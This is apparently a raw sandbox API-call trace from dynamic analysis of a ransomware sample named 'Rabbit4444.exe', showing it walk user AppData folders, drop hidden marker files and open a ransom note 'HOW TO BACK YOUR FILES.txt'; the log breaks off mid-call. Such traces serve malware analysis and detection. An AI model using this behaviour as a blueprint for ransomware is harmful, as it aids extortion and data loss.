[0055.794] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\SettingsContainer\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0055.794] CloseHandle (hObject=0x27c) returned 1 [0055.794] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\SettingsContainer") returned 72 [0055.794] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0055.794] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\SettingsContainer\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdb1a72e3, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xdb1a72e3, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xea946f02, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0055.795] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.795] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.795] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0055.795] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0055.795] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdb1a72e3, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xdb1a72e3, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xea946f02, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.795] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.795] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.795] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0055.795] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0055.795] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0055.795] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xea946f02, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xea946f02, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xea946f02, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0055.795] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.795] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0055.795] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xea946f02, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xea946f02, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xea946f02, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0055.795] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0055.795] lstrcpyW (in: lpString1=0x130ebca, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0055.795] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\SettingsContainer\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\publishers\\8wekyb3d8bbwe\\settingscontainer\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0055.795] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0055.796] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0055.796] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.796] CloseHandle (hObject=0x278) returned 1 [0055.796] CloseHandle (hObject=0x27c) returned 1 [0055.796] GetCurrentThreadId () returned 0xd98 [0055.796] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6530 [0055.796] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Microsoft.WindowsAlarms", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Microsoft.WindowsAlarms") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Microsoft.WindowsAlarms" [0055.796] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf11e8 | out: hHeap=0xe0000) returned 1 [0055.796] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6528 | out: hHeap=0xe0000) returned 1 [0055.796] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Microsoft.WindowsAlarms" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Microsoft.WindowsAlarms") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Microsoft.WindowsAlarms" [0055.796] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Microsoft.WindowsAlarms", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Microsoft.WindowsAlarms\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Microsoft.WindowsAlarms\\" [0055.796] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Microsoft.WindowsAlarms\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Microsoft.WindowsAlarms\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Microsoft.WindowsAlarms\\.BFC0E91B00AE8A0620D3" [0055.796] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Microsoft.WindowsAlarms\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\publishers\\8wekyb3d8bbwe\\microsoft.windowsalarms\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0055.799] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0055.801] FlushFileBuffers (hFile=0x27c) returned 1 [0055.802] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Microsoft.WindowsAlarms\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0055.802] CloseHandle (hObject=0x27c) returned 1 [0055.803] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Microsoft.WindowsAlarms") returned 78 [0055.803] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0055.803] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Microsoft.WindowsAlarms\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea121655, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xea121655, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xea946f02, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0055.803] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.803] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.803] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0055.803] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0055.803] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea121655, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xea121655, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xea946f02, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.804] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.804] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.804] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0055.804] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0055.804] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0055.804] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xea946f02, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xea946f02, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xea946f02, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0055.804] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.804] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0055.804] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xea946f02, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xea946f02, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xea946f02, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0055.804] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0055.804] lstrcpyW (in: lpString1=0x130ebd6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0055.804] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Microsoft.WindowsAlarms\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\publishers\\8wekyb3d8bbwe\\microsoft.windowsalarms\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0055.804] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0055.804] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0055.805] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.805] CloseHandle (hObject=0x278) returned 1 [0055.805] CloseHandle (hObject=0x27c) returned 1 [0055.805] GetCurrentThreadId () returned 0xd98 [0055.805] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6510 [0055.805] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Licenses", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Licenses") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Licenses" [0055.805] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0055.805] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6508 | out: hHeap=0xe0000) returned 1 [0055.805] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Licenses" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Licenses") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Licenses" [0055.805] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Licenses", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Licenses\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Licenses\\" [0055.805] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Licenses\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Licenses\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Licenses\\.BFC0E91B00AE8A0620D3" [0055.805] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Licenses\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\publishers\\8wekyb3d8bbwe\\licenses\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0055.810] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0055.813] FlushFileBuffers (hFile=0x27c) returned 1 [0055.814] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Licenses\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0055.814] CloseHandle (hObject=0x27c) returned 1 [0055.814] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Licenses") returned 63 [0055.814] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0055.814] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Licenses\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28ee7f08, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x28ee7f08, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0xea96d181, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0055.815] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.815] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.815] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0055.815] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0055.815] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28ee7f08, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x28ee7f08, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0xea96d181, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.815] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.815] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.815] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0055.815] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0055.815] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0055.815] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xea96d181, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xea96d181, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xea96d181, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0055.815] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.815] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0055.815] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xea96d181, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xea96d181, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xea96d181, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0055.815] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0055.815] lstrcpyW (in: lpString1=0x130ebb8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0055.815] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Licenses\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\publishers\\8wekyb3d8bbwe\\licenses\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0055.815] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0055.816] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0055.816] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.816] CloseHandle (hObject=0x278) returned 1 [0055.816] CloseHandle (hObject=0x27c) returned 1 [0055.816] GetCurrentThreadId () returned 0xd98 [0055.816] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf64b0 [0055.816] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Fonts", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Fonts") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Fonts" [0055.816] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0055.816] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf64a8 | out: hHeap=0xe0000) returned 1 [0055.816] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Fonts" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Fonts") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Fonts" [0055.816] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Fonts", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Fonts\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Fonts\\" [0055.816] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Fonts\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Fonts\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Fonts\\.BFC0E91B00AE8A0620D3" [0055.816] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Fonts\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\publishers\\8wekyb3d8bbwe\\fonts\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0055.819] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0055.822] FlushFileBuffers (hFile=0x27c) returned 1 [0055.823] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Fonts\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0055.823] CloseHandle (hObject=0x27c) returned 1 [0055.823] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Fonts") returned 60 [0055.823] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0055.823] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Fonts\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3e09841, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2fbade0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xea96d181, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a50 [0055.823] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.823] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.823] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0055.824] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0055.824] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3e09841, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2fbade0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xea96d181, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.824] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.824] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.824] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0055.824] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0055.824] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0055.824] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xea96d181, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xea96d181, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xea993314, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0055.824] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.824] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0055.824] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xea96d181, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xea96d181, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xea993314, ftLastWriteTime.dwHighDateTime=0x1d54052, 